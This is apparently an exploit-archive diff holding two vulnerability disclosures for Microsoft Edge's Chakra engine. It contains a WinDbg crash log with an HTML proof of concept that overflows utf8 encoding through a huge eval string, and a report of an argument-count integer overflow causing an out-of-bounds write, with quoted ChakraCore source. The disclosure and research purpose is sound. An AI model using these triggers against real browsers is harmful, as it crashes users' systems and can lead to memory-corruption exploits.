ModLoad: 00007ffc`dc620000 00007ffc`dc648000 C:\Windows\SYSTEM32\srpapi.dll
ModLoad: 00007ffc`f92f0000 00007ffc`f94b9000 C:\Windows\System32\CRYPT32.dll
ModLoad: 00007ffc`f8540000 00007ffc`f8551000 C:\Windows\System32\MSASN1.dll
ModLoad: 00007ffc`deaf0000 00007ffc`deb4a000 C:\Windows\System32\Windows.Graphics.dll
ModLoad: 00007ffc`f3ba0000 00007ffc`f3bfd000 C:\Windows\SYSTEM32\ninput.dll
ModLoad: 00007ffc`f6020000 00007ffc`f65c4000 C:\Windows\SYSTEM32\d2d1.dll
ModLoad: 00007ffc`e9a00000 00007ffc`e9cbf000 C:\Windows\SYSTEM32\DWrite.dll
ModLoad: 00007ffc`dc5e0000 00007ffc`dc5ef000 C:\Windows\System32\Windows.Internal.SecurityMitigationsBroker.dll
ModLoad: 00007ffc`eb400000 00007ffc`eb442000 C:\Windows\SYSTEM32\vm3dum64.dll
ModLoad: 00007ffc`eb390000 00007ffc`eb3f7000 C:\Windows\SYSTEM32\D3D10Level9.dll
ModLoad: 00007ffc`f3150000 00007ffc`f31bb000 C:\Windows\System32\oleacc.dll
ModLoad: 00007ffc`dc5d0000 00007ffc`dc5e0000 C:\Windows\system32\msimtf.dll
ModLoad: 00007ffc`e9970000 00007ffc`e99f8000 C:\Windows\system32\directmanipulation.dll
ModLoad: 00007ffc`db710000 00007ffc`db724000 C:\Windows\System32\Windows.System.Profile.PlatformDiagnosticsAndUsageDataSettings.dll
ModLoad: 00007ffc`dc590000 00007ffc`dc5c8000 C:\Windows\System32\smartscreenps.dll
ModLoad: 00007ffc`e9780000 00007ffc`e9908000 C:\Windows\SYSTEM32\windows.globalization.dll
(2004.11d0): Access violation - code c0000005 (!!! second chance !!!)
chakra!utf8::EncodeIntoImpl<1>+0xb5:
00007ffc`dbdb69e5 418910 mov dword ptr [r8],edx ds:0000023d`22d81000=????????
0:016> r
rax=0000000000000061 rbx=000000bb058fb4f0 rcx=0000000000006100
rdx=0000000061616161 rsi=0000000000000002 rdi=000000bb058fb000
rip=00007ffcdbdb69e5 rsp=000000bb058fb700 rbp=0000023d1f937b60
r8=0000023d22d81000 r9=0000023d330e4fc8 r10=000000005555462c
r11=0000023d22d80030 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=000000bb058fbd00
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
chakra!utf8::EncodeIntoImpl<1>+0xb5:
00007ffc`dbdb69e5 418910 mov dword ptr [r8],edx ds:0000023d`22d81000=????????
0:016> !address r8
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\SYSTEM32\vm3dum64.dll -
*** ERROR: Symbol file could not be found. Defaulted to export symbols for C:\Windows\System32\ole32.dll -
Usage: <unclassified>
Allocation Base: 0000023d`22d80000
Base Address: 0000023d`22d81000
End Address: 0000023d`22d85000
Region Size: 00000000`00004000
Type: 00020000 MEM_PRIVATE
State: 00002000 MEM_RESERVE
Protect: 00000000
0:016> !address r8-1
Usage: <unclassified>
Allocation Base: 0000023d`22d80000
Base Address: 0000023d`22d80000
End Address: 0000023d`22d81000
Region Size: 00000000`00001000
Type: 00020000 MEM_PRIVATE
State: 00001000 MEM_COMMIT
Protect: 00000004 PAGE_READWRITE
0:016> db 23d`22d80000
0000023d`22d80000 01 00 00 00 00 00 00 00-80 77 93 1f 3d 02 00 00 .........w..=...
0000023d`22d80010 00 00 00 00 00 00 00 00-d0 0f 00 00 00 00 00 00 ................
0000023d`22d80020 00 00 d8 22 3d 02 00 00-00 00 00 00 00 00 00 00 ..."=...........
0000023d`22d80030 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80040 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80050 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80060 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80070 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0:016> kb
RetAddr : Args to Child : Call Site
00007ffc`dbbf2611 : 0000023d`22d80030 0000023d`330e3020 00000000`55555600 00000235`00000004 : chakra!utf8::EncodeIntoImpl<1>+0xb5
00007ffc`dbb98201 : 0000023d`1f937b60 0000023d`330e3020 0000023d`55555600 000000bb`00000000 : chakra!Js::GlobalObject::DefaultEvalHelper+0x171
00007ffc`dbb97fb8 : 0000023d`22de0000 00007ffc`dc2c9f80 0000023d`00000000 0000023d`22ddc000 : chakra!Js::GlobalObject::VEval+0x231
00007ffc`dbb97ecd : 000000bb`058fbd40 0000023d`22ddb5c0 0000023d`1f934ba0 000000bb`058fbd00 : chakra!Js::GlobalObject::EntryEvalHelper+0xc8
00007ffc`dbdf6be3 : 0000023d`22ddb5c0 00000000`18000003 0000023d`22df0020 0000023d`22df9460 : chakra!Js::GlobalObject::EntryEval+0x7d
00007ffc`dbce6bf3 : 0000023d`1f934ba0 00000000`00000018 000000bb`058fbde8 0000023d`22ddc000 : chakra!amd64_CallFunction+0x93
00007ffc`dbba71ac : 0000023d`22ddb5c0 00007ffc`dbb97e50 000000bb`058fbe10 000000bb`058fbfa0 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffc`dbba77b4 : 000000bb`058fbfa0 0000023d`22ecc053 0000023d`22ddb5c0 00007ffc`00000008 : chakra!Js::InterpreterStackFrame::OP_CallCommon<Js::OpLayoutDynamicProfile<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > > >+0x114
00007ffc`dbc84920 : 000000bb`058fbfa0 0000023d`22ecc053 0000023d`058fbfa0 0000023d`22ecc061 : chakra!Js::InterpreterStackFrame::OP_ProfiledReturnTypeCallIExtendedFlags<Js::OpLayoutT_CallIExtendedFlags<Js::LayoutSizePolicy<0> > >+0x5c
00007ffc`dbc7ff2c : 000000bb`058fbfa0 00000000`00000000 00000000`00000000 00000000`00000000 : chakra!Js::InterpreterStackFrame::ProcessProfiled+0x1250
00007ffc`dbd180cc : 000000bb`058fbfa0 0000023d`33040000 000000bb`058fc150 00000000`00000001 : chakra!Js::InterpreterStackFrame::Process+0x12c
00007ffc`dbd17be1 : 0000023d`22e00420 000000bb`058fc330 0000023d`33060fc2 000000bb`058fc348 : chakra!Js::InterpreterStackFrame::InterpreterHelper+0x4ac
0000023d`33060fc2 : 000000bb`058fc380 00000000`00000000 00000000`00000000 00007ffc`dbdf6750 : chakra!Js::InterpreterStackFrame::InterpreterThunk+0x51
00007ffc`dbdf6be3 : 0000023d`22e00420 00000000`00000000 00000000`00000000 00000000`00000000 : 0x23d`33060fc2
00007ffc`dbce6bf3 : 0000023d`1f934ba0 00000000`00000000 0000023d`1f940c90 00007ffc`dbcfa837 : chakra!amd64_CallFunction+0x93
00007ffc`dbd11810 : 0000023d`22e00420 00007ffc`dbdf6df0 000000bb`058fc480 0000023d`1f937b60 : chakra!Js::JavascriptFunction::CallFunction<1>+0x83
00007ffc`dbd10a37 : 0000023d`22e00420 000000bb`058fc570 0000023d`1f937b60 00007ffc`fc027100 : chakra!Js::JavascriptFunction::CallRootFunctionInternal+0x100
00007ffc`dbdd907e : 0000023d`22e00420 000000bb`058fc5d0 0000023d`1f937b60 0000023d`1f943000 : chakra!Js::JavascriptFunction::CallRootFunction+0x4b
00007ffc`dbd3cd54 : 0000023d`22e00420 000000bb`058fc610 00000000`00000000 000000bb`058fc628 : chakra!ScriptSite::CallRootFunction+0x6a
00007ffc`dbcd1b49 : 0000023d`1f937a50 0000023d`22e00420 000000bb`058fc6c0 00000000`00000000 : chakra!ScriptSite::Execute+0x124
00007ffc`dbcd2e8e : 0000023d`1f934750 000000bb`058fcbc8 000000bb`058fcc00 000000bb`80000082 : chakra!ScriptEngine::ExecutePendingScripts+0x1a5
00007ffc`dbcd3121 : 0000023d`1f934750 0000023d`2101f5c4 00000000`00000000 00000235`1f594330 : chakra!ScriptEngine::ParseScriptTextCore+0x436
00007ffc`dcac3c75 : 0000023d`1f9347a0 0000023d`2101f5c4 00000235`00000042 00000000`00000000 : chakra!ScriptEngine::ParseScriptText+0xb1
00007ffc`dcac3abe : 00000000`00000000 000000bb`058fca99 00000235`1f594260 00000235`00000000 : edgehtml!CJScript9Holder::ParseScriptText+0x119
00007ffc`dcac35d7 : 00000000`00000000 00000235`1f594260 00000235`1f51c1c0 00000235`1f5941b0 : edgehtml!CScriptCollection::ParseScriptText+0x202
00007ffc`dcac2f07 : 00000235`1f530c01 00000235`1f58c100 00000235`00000082 00007ffc`00000000 : edgehtml!CScriptData::CommitCode+0x357
00007ffc`dcb82f8d : 00000000`ffffffff 00000235`1f51c460 00000000`ffffffff 00000000`00000000 : edgehtml!CScriptData::Execute+0x20f
00007ffc`dc9c43d4 : 00000000`00000000 00000235`1f56c440 00000000`00000001 00007ffc`dcb7ceb9 : edgehtml!CHtmScriptParseCtx::Execute+0x7d
00007ffc`dc9c34a1 : 00000235`1f530c00 00000000`00000000 00000235`1f530c00 00000235`1f50c8c0 : edgehtml!CHtmParseBase::Execute+0x204
00007ffc`dcb7d23b : 00000000`04cd60c0 00000235`1f500000 00000235`1f5600b0 00000235`1f50c8c0 : edgehtml!CHtmPost::Exec+0x1e1
00007ffc`dcb7d11f : 00000235`1f50c8c0 00000000`04cd60c0 0000023d`203725a0 00000000`00000000 : edgehtml!CHtmPost::Run+0x2f
00007ffc`dcb7cfd3 : 00000235`1f500000 00000012`c245be01 00000000`00000002 00000235`1f541680 : edgehtml!PostManExecute+0x63
00007ffc`dcb7ce6d : 00000235`1f50c8c0 00000012`c245be61 0000023d`00000000 00007ffc`eff34779 : edgehtml!PostManResume+0xa3
00007ffc`dcb8b353 : 00000235`1f528600 0000023d`20350350 00000000`00000000 00000000`00000000 : edgehtml!CHtmPost::OnDwnChanCallback+0x3d
00007ffc`dcb650db : 00000235`1f5082d0 0000023d`1f927e73 0000023d`1f902200 000000bb`058fd150 : edgehtml!CDwnChan::OnMethodCall+0x23
00007ffc`dc9f1706 : 0000023d`1f902728 00000235`1f541680 0000023d`1f902260 000000bb`058fd180 : edgehtml!GWndAsyncTask::Run+0x1b
00007ffc`dcb3a860 : 0000002b`dd92f8c0 00000235`1f5416e0 00000235`1f5600b0 00007ffc`dca99138 : edgehtml!HTML5TaskScheduler::RunReadiedTask+0x236
00007ffc`dcb3a683 : 0000023d`20350350 00000000`00000000 00000000`00000002 00000235`1f508170 : edgehtml!TaskSchedulerBase::RunReadiedTasksInTaskQueueWithCallback+0x70
00007ffc`dc9f22b3 : 000000bb`058fd630 00000000`00008002 00000235`1f508170 00007ffc`fade47df : edgehtml!HTML5TaskScheduler::RunReadiedTasks+0xa3
00007ffc`dc9f07a5 : 00000000`00008002 00000235`1f500000 0000d687`35232df0 00000000`00000002 : edgehtml!NormalPriorityAtInputEventLoopDriver::DriveRegularPriorityTaskExecution+0x53
00007ffc`fadcbc50 : 00000000`001b029a 00000000`00000001 00000000`00000002 00000000`80000012 : edgehtml!GlobalWndProc+0x125
00007ffc`fadcb5cf : 00000235`1de0b5c0 00007ffc`dc9f0680 00000000`001b029a 00000000`001b029a : USER32!UserCallWinProcCheckWow+0x280
00007ffc`dae36d0e : 000000bb`058fd5d0 00000000`00000000 0000023d`2030b260 00000000`00000000 : USER32!DispatchMessageWorker+0x19f
00007ffc`dae4eecb : 00000000`00000000 00000000`00000001 00000235`1d929e40 00000235`1d8d4af0 : EdgeContent!CBrowserTab::_TabWindowThreadProc+0x3ee
00007ffc`e85eb4a8 : 00000000`00000000 00000235`1d928f50 00000000`00000000 00000000`00000000 : EdgeContent!LCIETab_ThreadProc+0x2ab
00007ffc`fb9e2774 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : msiso!_IsoThreadProc_WrapperToReleaseScope+0x48
00007ffc`fc0d0d61 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : KERNEL32!BaseThreadInitThunk+0x14
00000000`00000000 : 00000000`00000000 00000000`00000000 00000000`00000000 00000000`00000000 : ntdll!RtlUserThreadStart+0x21
0:016> db r8 l-100
0000023d`22d80f00 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f10 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f20 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f30 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f40 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f50 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f60 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f70 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f80 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80f90 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80fa0 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80fb0 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80fc0 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80fd0 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80fe0 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0000023d`22d80ff0 61 61 61 61 61 61 61 61-61 61 61 61 61 61 61 61 aaaaaaaaaaaaaaaa
0:016> r
rax=0000000000000061 rbx=000000bb058fb4f0 rcx=0000000000006100
rdx=0000000061616161 rsi=0000000000000002 rdi=000000bb058fb000
rip=00007ffcdbdb69e5 rsp=000000bb058fb700 rbp=0000023d1f937b60
r8=0000023d22d81000 r9=0000023d330e4fc8 r10=000000005555462c
r11=0000023d22d80030 r12=0000000000000000 r13=0000000000000000
r14=0000000000000000 r15=000000bb058fbd00
iopl=0 nv up ei pl nz na pe nc
cs=0033 ss=002b ds=002b es=002b fs=0053 gs=002b efl=00010200
chakra!utf8::EncodeIntoImpl<1>+0xb5:
00007ffc`dbdb69e5 418910 mov dword ptr [r8],edx ds:0000023d`22d81000=????????
-->
<html>
<head>
<title> POC </title>
</head>
<script>
//alert('');
var code = 'a'.repeat(0x55555600);
eval(code);
</script>
</html>

867
platforms/windows/dos/42466.html Executable file
View file

@ -0,0 +1,867 @@
<!--
Report by Huang Anwen, He Xiaoxiao of ichunqiu Ker Team
There is an overflow when constructoring a new object with arguments which has 0xffff elements in Chakra!
This issue can be reproduced steadly in uptodate Edge in Win10 WIP.
//ChakraCore-master\lib\Runtime\ByteCode\ByteCodeEmitter.cpp
void EmitNew(ParseNode* pnode, ByteCodeGenerator* byteCodeGenerator, FuncInfo* funcInfo)
{
Js::ArgSlot argCount = pnode->sxCall.argCount; //pnode->sxCall.argCount=0xFFFF
argCount++; // include "this" //overflow!!!! argCount==0
BOOL fSideEffectArgs = FALSE;
unsigned int tmpCount = CountArguments(pnode->sxCall.pnodeArgs, &fSideEffectArgs);
Assert(argCount == tmpCount);
if (argCount != (Js::ArgSlot)argCount)
{
Js::Throw::OutOfMemory();
}
byteCodeGenerator->StartStatement(pnode);
// Start call, allocate out param space
funcInfo->StartRecordingOutArgs(argCount);
// Assign the call target operand(s), putting them into expression temps if necessary to protect
// them from side-effects.
if (fSideEffectArgs)
{
SaveOpndValue(pnode->sxCall.pnodeTarget, funcInfo);
}
if (pnode->sxCall.pnodeTarget->nop == knopSuper)
{
EmitSuperFieldPatch(funcInfo, pnode, byteCodeGenerator);
}
Emit(pnode->sxCall.pnodeTarget, byteCodeGenerator, funcInfo, false, true);
if (pnode->sxCall.pnodeArgs == nullptr)
{
funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
Js::OpCode op = (CreateNativeArrays(byteCodeGenerator, funcInfo)
&& CallTargetIsArray(pnode->sxCall.pnodeTarget))
? Js::OpCode::NewScObjArray : Js::OpCode::NewScObject;
Assert(argCount == 1);
Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode),
pnode->sxCall.pnodeTarget->location, argCount, callSiteId);
}
else
{
byteCodeGenerator->Writer()->StartCall(Js::OpCode::StartCall, argCount);
uint32 actualArgCount = 0;
if (IsCallOfConstants(pnode))
{
funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
actualArgCount = EmitNewObjectOfConstants(pnode, byteCodeGenerator, funcInfo, argCount);
}
else
{
Js::OpCode op;
if ((CreateNativeArrays(byteCodeGenerator, funcInfo) && CallTargetIsArray(pnode->sxCall.pnodeTarget)))
{
op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjArraySpread : Js::OpCode::NewScObjArray;
}
else
{
op = pnode->sxCall.spreadArgCount > 0 ? Js::OpCode::NewScObjectSpread : Js::OpCode::NewScObject;
}
Js::ProfileId callSiteId = byteCodeGenerator->GetNextCallSiteId(op);
Js::AuxArray<uint32> *spreadIndices = nullptr;
actualArgCount = EmitArgList(pnode->sxCall.pnodeArgs, Js::Constants::NoRegister, Js::Constants::NoRegister, Js::Constants::NoRegister,
false, true, byteCodeGenerator, funcInfo, callSiteId, pnode->sxCall.spreadArgCount, &spreadIndices);
funcInfo->ReleaseLoc(pnode->sxCall.pnodeTarget);
if (pnode->sxCall.spreadArgCount > 0)
{
Assert(spreadIndices != nullptr);
uint spreadExtraAlloc = spreadIndices->count * sizeof(uint32);
uint spreadIndicesSize = sizeof(*spreadIndices) + spreadExtraAlloc;
byteCodeGenerator->Writer()->CallIExtended(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
(uint16)actualArgCount, Js::CallIExtended_SpreadArgs,
spreadIndices, spreadIndicesSize, callSiteId);
}
else
{
byteCodeGenerator->Writer()->CallI(op, funcInfo->AcquireLoc(pnode), pnode->sxCall.pnodeTarget->location,
(uint16)actualArgCount, callSiteId);
}
}
Assert(argCount == actualArgCount);
}
// End call, pop param space
funcInfo->EndRecordingOutArgs(argCount);
return;
}
//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
inline void InterpreterStackFrame::SetOut(ArgSlot_OneByte outRegisterID, Var aValue)
{
Assert(m_outParams + outRegisterID < m_outSp);
m_outParams[outRegisterID] = aValue; //OOB Write!!!! outRegisterID could be 0~0xFFFF, but m_outParams has one element only
}
//ChakraCore-master\lib\Runtime\Language\InterpreterStackFrame.cpp
Var InterpreterStackFrame::InterpreterHelper(ScriptFunction* function, ArgumentReader args, void* returnAddress, void* addressOfReturnAddress, const bool isAsmJs)
{
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
// Support for simulating partially initialized interpreter stack frame.
InterpreterThunkStackCountTracker tracker;
if (CONFIG_ISENABLED(InjectPartiallyInitializedInterpreterFrameErrorFlag) &&
CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameError) == InterpreterThunkStackCountTracker::GetCount())
{
switch (CONFIG_FLAG(InjectPartiallyInitializedInterpreterFrameErrorType))
{
case 0:
DebugBreak();
break;
case 1:
Js::JavascriptError::MapAndThrowError(function->GetScriptContext(), VBSERR_InternalError);
break;
default:
DebugBreak();
}
}
#endif
ScriptContext* functionScriptContext = function->GetScriptContext();
ThreadContext * threadContext = functionScriptContext->GetThreadContext();
Assert(!threadContext->IsDisableImplicitException());
functionScriptContext->VerifyAlive(!function->IsExternal());
Assert(threadContext->IsScriptActive());
Assert(threadContext->IsInScript());
FunctionBody* executeFunction = JavascriptFunction::FromVar(function)->GetFunctionBody();
#ifdef ENABLE_DEBUG_CONFIG_OPTIONS
if (!isAsmJs && executeFunction->IsInDebugMode() != functionScriptContext->IsScriptContextInDebugMode()) // debug mode mismatch
{
if (executeFunction->GetUtf8SourceInfo()->GetIsLibraryCode())
{
Assert(!executeFunction->IsInDebugMode()); // Library script byteCode is never in debug mode
}
else
{
Throw::FatalInternalError();
}
}
#endif
if (executeFunction->GetInterpretedCount() == 0)
{
executeFunction->TraceInterpreterExecutionMode();
}
class AutoRestore
{
private:
ThreadContext *const threadContext;
const uint8 savedLoopDepth;
public:
AutoRestore(ThreadContext *const threadContext, FunctionBody *const executeFunction)
: threadContext(threadContext),
savedLoopDepth(threadContext->LoopDepth())
{
if (savedLoopDepth != 0 && !executeFunction->GetIsAsmJsFunction())
{
executeFunction->SetWasCalledFromLoop();
}
}
~AutoRestore()
{
threadContext->SetLoopDepth(savedLoopDepth);
}
} autoRestore(threadContext, executeFunction);
#if ENABLE_PROFILE_INFO
DynamicProfileInfo * dynamicProfileInfo = nullptr;
const bool doProfile = executeFunction->GetInterpreterExecutionMode(false) == ExecutionMode::ProfilingInterpreter ||
(executeFunction->IsInDebugMode() && DynamicProfileInfo::IsEnabled(executeFunction));
if (doProfile)
{
#if !DYNAMIC_INTERPRETER_THUNK
executeFunction->EnsureDynamicProfileInfo();
#endif
dynamicProfileInfo = executeFunction->GetDynamicProfileInfo();
threadContext->ClearImplicitCallFlags();
}
#else
const bool doProfile = false;
#endif
executeFunction->IncreaseInterpretedCount();
#ifdef BGJIT_STATS
functionScriptContext->interpretedCount++;
functionScriptContext->maxFuncInterpret = max(functionScriptContext->maxFuncInterpret, executeFunction->GetInterpretedCount());
#endif
AssertMsg(!executeFunction->IsDeferredParseFunction(),
"Non-intrinsic functions must provide byte-code to execute");
executeFunction->BeginExecution();
bool fReleaseAlloc = false;
InterpreterStackFrame* newInstance = nullptr;
Var* allocation = nullptr;
if (!isAsmJs && executeFunction->IsCoroutine())
{
// If the FunctionBody is a generator then this call is being made by one of the three
// generator resuming methods: next(), throw(), or return(). They all pass the generator
// object as the first of two arguments. The real user arguments are obtained from the
// generator object. The second argument is the ResumeYieldData which is only needed
// when resuming a generator and so it only used here if a frame already exists on the
// generator object.
AssertMsg(args.Info.Count == 2, "Generator ScriptFunctions should only be invoked by generator APIs with the pair of arguments they pass in -- the generator object and a ResumeYieldData pointer");
JavascriptGenerator* generator = JavascriptGenerator::FromVar(args[0]);
newInstance = generator->GetFrame();
if (newInstance != nullptr)
{
ResumeYieldData* resumeYieldData = static_cast<ResumeYieldData*>(args[1]);
newInstance->SetNonVarReg(executeFunction->GetYieldRegister(), resumeYieldData);
// The debugger relies on comparing stack addresses of frames to decide when a step_out is complete so
// give the InterpreterStackFrame a legit enough stack address to make this comparison work.
newInstance->m_stackAddress = reinterpret_cast<DWORD_PTR>(&generator);
}
else
{
//
// Allocate a new InterpreterStackFrame instance on the recycler heap.
// It will live with the JavascriptGenerator object.
//
Arguments generatorArgs = generator->GetArguments();
InterpreterStackFrame::Setup setup(function, generatorArgs);
size_t varAllocCount = setup.GetAllocationVarCount();
size_t varSizeInBytes = varAllocCount * sizeof(Var);
DWORD_PTR stackAddr = reinterpret_cast<DWORD_PTR>(&generator); // as mentioned above, use any stack address from this frame to ensure correct debugging functionality
Var loopHeaderArray = executeFunction->GetHasAllocatedLoopHeaders() ? executeFunction->GetLoopHeaderArrayPtr() : nullptr;
allocation = RecyclerNewPlus(functionScriptContext->GetRecycler(), varSizeInBytes, Var);
AnalysisAssert(allocation);
#if DBG
// Allocate invalidVar on GC instead of stack since this InterpreterStackFrame will out live the current real frame
Js::RecyclableObject* invalidVar = (Js::RecyclableObject*)RecyclerNewPlusLeaf(functionScriptContext->GetRecycler(), sizeof(Js::RecyclableObject), Var);
AnalysisAssert(invalidVar);
memset(reinterpret_cast<void*>(invalidVar), 0xFE, sizeof(Js::RecyclableObject));
newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr, invalidVar);
#else
newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns(), doProfile, loopHeaderArray, stackAddr);
#endif
newInstance->m_reader.Create(executeFunction);
generator->SetFrame(newInstance, varSizeInBytes);
}
}
else
{
InterpreterStackFrame::Setup setup(function, args);
size_t varAllocCount = setup.GetAllocationVarCount();
size_t varSizeInBytes = varAllocCount * sizeof(Var);
//
// Allocate a new InterpreterStackFrame instance on the interpreter's virtual stack.
//
DWORD_PTR stackAddr;
// If the locals area exceeds a certain limit, allocate it from a private arena rather than
// this frame. The current limit is based on an old assert on the number of locals we would allow here.
if (varAllocCount > InterpreterStackFrame::LocalsThreshold)
{
ArenaAllocator *tmpAlloc = nullptr;
fReleaseAlloc = functionScriptContext->EnsureInterpreterArena(&tmpAlloc);
allocation = (Var*)tmpAlloc->Alloc(varSizeInBytes);
stackAddr = reinterpret_cast<DWORD_PTR>(&allocation); // use a stack address so the debugger stepping logic works (step-out, for example, compares stack depths to determine when to complete the step)
}
else
{
PROBE_STACK_PARTIAL_INITIALIZED_INTERPRETER_FRAME(functionScriptContext, Js::Constants::MinStackInterpreter + varSizeInBytes);
allocation = (Var*)_alloca(varSizeInBytes);
#if DBG
memset(allocation, 0xFE, varSizeInBytes);
#endif
stackAddr = reinterpret_cast<DWORD_PTR>(allocation);
}
/*
* If the function has any loop headers, we allocate an array for the loop headers wrappers, and
* reference the wrappers in the array. We then push the pointer to the array onto the stack itself.
* We do this so that while the function is being interpreted, we don't want the jitted loop
* bodies to be collected, even if the loop body isn't being executed. The loop body will
* get collected when the function has been JITted, and when the function exits the interpreter.
* The array contains nulls if the loop body isn't jitted (or hasn't been jitted yet) but
* it's cheaper to just copy them all into the recycler array rather than just the ones that
* have been jitted.
*/
Var loopHeaderArray = nullptr;
if (executeFunction->GetHasAllocatedLoopHeaders())
{
// Loop header array is recycler allocated, so we push it on the stack
// When we scan the stack, we'll recognize it as a recycler allocated
// object, and mark it's contents and keep the individual loop header
// wrappers alive
loopHeaderArray = executeFunction->GetLoopHeaderArrayPtr();
}
#if DBG
Js::RecyclableObject * invalidStackVar = (Js::RecyclableObject*)_alloca(sizeof(Js::RecyclableObject));
memset(reinterpret_cast<void*>(invalidStackVar), 0xFE, sizeof(Js::RecyclableObject));
newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr, invalidStackVar);
#else
newInstance = setup.InitializeAllocation(allocation, executeFunction->GetHasImplicitArgIns() && !isAsmJs, doProfile, loopHeaderArray, stackAddr);
#endif
newInstance->m_reader.Create(executeFunction);
}
//
// Execute the function's byte-code, returning the return-value:
// - Mark that the function is current executing and may not be modified.
//
#if ENABLE_TTD
TTD::TTDExceptionFramePopper exceptionFramePopper;
if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
{
bool isInFinally = ((newInstance->m_flags & Js::InterpreterStackFrameFlags_WithinFinallyBlock) == Js::InterpreterStackFrameFlags_WithinFinallyBlock);
threadContext->TTDExecutionInfo->PushCallEvent(function, args.Info.Count, args.Values, isInFinally);
exceptionFramePopper.PushInfo(threadContext->TTDExecutionInfo, function);
}
#endif
Var aReturn = nullptr;
{
if (!isAsmJs && executeFunction->IsInDebugMode())
{
#if DYNAMIC_INTERPRETER_THUNK
PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
aReturn = newInstance->DebugProcess();
#else
aReturn = newInstance->DebugProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
#endif
}
else
{
#if DYNAMIC_INTERPRETER_THUNK
PushPopFrameHelper pushPopFrameHelper(newInstance, returnAddress, addressOfReturnAddress);
aReturn = newInstance->Process();
#else
aReturn = newInstance->ProcessThunk(_ReturnAddress(), _AddressOfReturnAddress());
#endif
}
}
executeFunction->EndExecution();
#if ENABLE_TTD
if(SHOULD_DO_TTD_STACK_STMT_OP(functionScriptContext))
{
exceptionFramePopper.PopInfo();
threadContext->TTDExecutionInfo->PopCallEvent(function, aReturn);
}
#endif
if (fReleaseAlloc)
{
functionScriptContext->ReleaseInterpreterArena();
}
#if ENABLE_PROFILE_INFO
if (doProfile)
{
dynamicProfileInfo->RecordImplicitCallFlags(threadContext->GetImplicitCallFlags());
}
#endif
if (isAsmJs)
{
return newInstance;
}
return aReturn;
}
Microsoft (R) Windows Debugger Version 6.12.0002.633 AMD64
Copyright (c) Microsoft Corporation. All rights reserved.
*** wait with pending attach
Symbol search path is: SRV*c:\mysymbol* http://msdl.microsoft.com/download/symbols
Executable search path is:
ModLoad: 00007ff6`1e3c0000 00007ff6`1e3e5000 C:\Windows\SystemApps\Microsoft.MicrosoftEdge_8wekyb3d8bbwe\MicrosoftEdgeCP.exe
ModLoad: 00007ffe`a1ea0000 00007ffe`a207b000 C:\Windows\SYSTEM32\ntdll.dll
ModLoad: 00007ffe`a0a70000 00007ffe`a0b1e000 C:\Windows\System32\KERNEL32.DLL
ModLoad: 00007ffe`9e590000 00007ffe`9e7d9000 C:\Windows\System32\KERNELBASE.dll
ModLoad: 00007ffe`9c900000 00007ffe`9c97e000 C:\Windows\SYSTEM32\apphelp.dll
